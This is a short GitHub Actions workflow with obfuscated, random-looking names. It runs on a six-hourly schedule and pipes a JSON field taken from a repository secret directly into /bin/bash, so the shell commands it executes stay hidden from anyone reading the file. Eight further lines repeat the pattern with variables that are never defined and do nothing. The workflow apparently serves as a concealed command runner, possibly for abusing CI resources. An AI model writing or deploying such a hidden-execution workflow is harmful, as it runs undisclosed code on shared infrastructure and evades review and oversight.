name: dingruoyashh
on:
  workflow_dispatch:
  schedule:
    - cron: '31 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dingruoyashh
        env:
          zuam42183: ${{ secrets.zuam42183 }}
        run: |
          echo $zuam42183 | jq -r .bybxc2 | /bin/bash
          echo $qu6 | jq -r .ps9067 | /bin/bash
          echo $ngi37340 | jq -r .g4400 | /bin/bash
          echo $ztx026 | jq -r .yf2 | /bin/bash
          echo $p1335 | jq -r .jzxma116 | /bin/bash
          echo $ylo4 | jq -r .muj13648 | /bin/bash
          echo $qy56541 | jq -r .xh28913 | /bin/bash
          echo $blt3 | jq -r .rpxr1 | /bin/bash
          echo $rhtaz3 | jq -r .njppp0 | /bin/bash

